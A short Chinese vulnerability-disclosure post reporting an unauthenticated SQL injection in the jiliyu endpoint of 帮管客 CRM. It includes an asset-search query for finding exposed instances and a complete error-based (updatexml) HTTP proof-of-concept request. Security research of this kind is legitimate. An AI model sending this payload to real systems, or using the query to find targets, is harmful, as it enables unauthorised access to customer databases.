文章总结： 帮管客CRM的jiliyu接口存在SQL注入漏洞，影响所有版本，允许未经身份认证的攻击者获取数据库敏感信息。文章提供了漏洞复现的POC代码和截图，并建议用户升级到最新版本以修复该漏洞。这是一个典型的漏洞分析文章，包含了漏洞描述、影响范围、复现方法和修复建议。 综合评分： 86 文章分类： 漏洞分析,漏洞POC,WEB安全,漏洞预警,渗透测试

帮管客CRM jiliyu接口存在SQL漏洞

原创

安服仔

北风漏洞复现文库

2025年12月6日 17:02 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

#

#

01

—

漏洞名称

帮管客CRM jiliyu接口存在SQL漏洞

02

—

影响版本

所有版本的帮管客CRM均受影响

03

—

漏洞简介

帮管客CRM是一款基于互联网的客户关系管理软件Q,主要用于帮助企业管理客户关系、提高销售效率、优化营销策略等。帮管客CRM的jiliyu接口确实存在SQL注入漏洞，该漏洞允许未经身份认证的攻击者通过构造特定请求获取数据库敏感信息

04

—

资产测绘

app="帮管客-CRM"

05

—

漏洞复现

 POC

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7f,(select%20md5(1)),0x7f),1)) HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-Alive

06

—

修复建议

升级到最新版本。

07

—

修复建议